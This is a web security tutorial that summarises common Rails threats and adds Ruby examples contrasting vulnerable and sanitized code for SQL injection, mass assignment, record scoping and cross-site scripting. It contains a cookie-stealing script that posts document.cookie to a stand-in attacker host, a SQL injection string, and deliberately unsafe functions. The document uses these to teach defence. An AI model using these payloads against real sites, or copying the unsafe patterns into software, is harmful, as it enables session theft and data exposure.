Overview of Security Threats
Here is a list of common security threats. None of these is specific to web applications built with Ruby on Rails. This list is summarized from Agile Web Development with Rails by Dave Thomas et al.
- SQL Injection. Inserting destructive SQL code into a URL or form data that gets passed to the database. Solution: sanitize the content that is passed to the database (add the needed escape characters).
- Creating Records from Form Parameters. Example: if the model has an admin attribute, an attacker could add an extra form parameter and gain admin privileges. Solution: make sure that sensitive attributes are not included in the model's attr_accessible list. These attributes should be set individually in the controller.
- Trusting ID Parameters. Users may edit the URL to request records that do not belong to them. Solution: scope the find call so that it can only retrieve records that belong to the current user.
- Exposed Controller Methods. Any controller method that does not correspond to a request (an action) must be declared protected or private.
- Cross-site scripting. In this attack the vulnerable site is made to send attacker-supplied JavaScript to a victim's browser, for example code that steals the user's cookie:
<script> document.location="http://badguysite.net/steal/" + document.cookie </script>
A web application should escape (replace less-than brackets and similar HTML markup characters with their escape sequences) all user-submitted content before sending it to browsers.
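For the SQL injection item, the following added example (not code from the book or from Rails) shows the difference between interpolating a parameter into a SQL string and binding it through a placeholder. The helpers bind_placeholders and quote_sql are a simplified, hypothetical model of what ActiveRecord's placeholder form does when you write User.where("name = ?", params[:name]); they are not the framework's own implementation.

```ruby
# Quote one Ruby value as a SQL literal. Strings are wrapped in single quotes
# and any embedded single quote is doubled, which is the standard SQL escape.
def quote_sql(value)
  case value
  when Integer then value.to_s
  when nil then "NULL"
  else "'#{value.to_s.gsub("'", "''")}'"
  end
end

# Replace each ? in CONDITION with the matching quoted value. The user input can
# only ever become a string literal; it cannot change the shape of the statement.
def bind_placeholders(condition, *values)
  unless condition.count("?") == values.size
    raise ArgumentError, "placeholder/value count mismatch"
  end
  values = values.dup
  condition.gsub("?") { quote_sql(values.shift) }
end

# The vulnerable pattern: raw interpolation lets the input become part of the SQL grammar.
def vulnerable_query(name)
  "SELECT * FROM users WHERE name = '#{name}'"
end

# The sanitized pattern: the same lookup built through the placeholder helper.
def safe_query(name)
  "SELECT * FROM users WHERE " + bind_placeholders("name = ?", name)
end

if __FILE__ == $0
  input = "x' OR '1'='1"   # constructed sample of hostile form input
  puts vulnerable_query(input)   # the OR clause is now part of the query
  puts safe_query(input)         # the whole input is one quoted literal
end
```

The vulnerable form turns the condition into `name = 'x' OR '1'='1'`, which matches every row; the bound form compares against the literal string the user typed, quotes and all.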
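The next three items (records from form parameters, trusting ID parameters, exposed controller methods) are illustrated together in this added example, which is a plain-Ruby sketch and not code from the book or from Rails. User#assign_attributes accepts only a whitelist, which is what attr_accessible did in the Rails versions the book covers (Rails 4 and later do the same job with strong parameters, params.require(:user).permit(:name, :email)). NotesController#show looks the record up through the current user's own notes, so an edited id parameter behaves like a nonexistent id. The hypothetical dispatch function calls only methods the controller declares public, mirroring how Rails routes only to public actions. The User, Note, NOTES and NotesController names and the sample data are all constructed for the example.

```ruby
class User
  ACCESSIBLE = [:name, :email].freeze   # attributes a form is allowed to set
  attr_reader :id, :name, :email, :admin

  def initialize(id)
    @id = id
    @admin = false
  end

  # Mass assignment from form parameters: keys outside the whitelist are dropped.
  def assign_attributes(params)
    params.each do |key, value|
      instance_variable_set("@#{key}", value) if ACCESSIBLE.include?(key.to_sym)
    end
    self
  end

  # Privileged attributes are set individually by trusted code, never from params.
  def promote_to_admin!
    @admin = true
  end
end

Note = Struct.new(:id, :owner_id, :body)

# Constructed sample data: notes belonging to user 10 and to user 20.
NOTES = [
  Note.new(1, 10, "user 10, first note"),
  Note.new(2, 10, "user 10, second note"),
  Note.new(3, 20, "user 20, only note"),
].freeze

class RecordNotFound < StandardError; end

class NotesController
  def initialize(current_user)
    @current_user = current_user
  end

  # Action: the lookup is scoped to the current user, so ids that belong to
  # someone else are treated exactly like ids that do not exist.
  def show(params)
    find_owned(params["id"].to_i).body
  end

  # Action: builds a user from form input; the admin flag cannot be set this way.
  def create(params)
    User.new(99).assign_attributes(params["user"] || {})
  end

  private

  # Helper, not an action: private keeps it off the routing surface.
  def find_owned(id)
    note = NOTES.find { |n| n.id == id && n.owner_id == @current_user.id }
    raise RecordNotFound, "no note #{id} for user #{@current_user.id}" if note.nil?
    note
  end
end

# Minimal router: /notes/show?id=2 becomes dispatch(controller, "show", {"id" => "2"}).
# Only methods the controller class itself declares public are callable.
def dispatch(controller, action, params)
  actions = controller.class.public_instance_methods(false)
  raise NoMethodError, "no public action #{action}" unless actions.include?(action.to_sym)
  controller.public_send(action, params)
end

if __FILE__ == $0
  ctrl = NotesController.new(User.new(10))
  puts dispatch(ctrl, "show", "id" => "2")                      # user 10's own note
  created = dispatch(ctrl, "create", "user" => { "name" => "eve", "admin" => "1" })
  puts "admin? #{created.admin}"                                 # false: extra parameter ignored
  [["show", { "id" => "3" }], ["find_owned", { "id" => "3" }]].each do |action, params|
    begin
      dispatch(ctrl, action, params)
    rescue RecordNotFound, NoMethodError => e
      puts "#{e.class}: #{e.message}"
    end
  end
end
```

Note that the scoped lookup returns "not found" rather than "forbidden" for another user's id; that is deliberate, since a distinct error would confirm to the requester that the record exists.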
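For the cross-site scripting item, this added example (not code from the book or from Rails) escapes user-submitted text before it is placed in an HTML page, using CGI.escapeHTML from Ruby's standard library; Rails' h helper and ERB::Util.html_escape do the same job, and Rails 3 and later apply it to ERB output by default. The render_comment and render_comment_unsafe functions are constructed for the example, and the sample input is the script shown in the text above.

```ruby
require "cgi"

# Sanitized version: angle brackets, quotes and ampersands become entities, so
# the browser displays the text instead of interpreting it as markup.
def render_comment(text)
  "<p class=\"comment\">#{CGI.escapeHTML(text)}</p>"
end

# Vulnerable version, kept only for contrast: raw interpolation puts whatever
# the user submitted into the page as live HTML.
def render_comment_unsafe(text)
  "<p class=\"comment\">#{text}</p>"
end

if __FILE__ == $0
  # The cookie-stealing script from the text, submitted as a comment body.
  payload = '<script> document.location="http://badguysite.net/steal/" + document.cookie </script>'
  puts render_comment_unsafe(payload)   # script tag reaches the browser intact
  puts render_comment(payload)          # &lt;script&gt; ... &lt;/script&gt;: shown as text
end
```

Escaping belongs at the point of output, not at input time: the same stored string may be rendered in HTML, in a JSON response or in a log, and each context needs its own escaping.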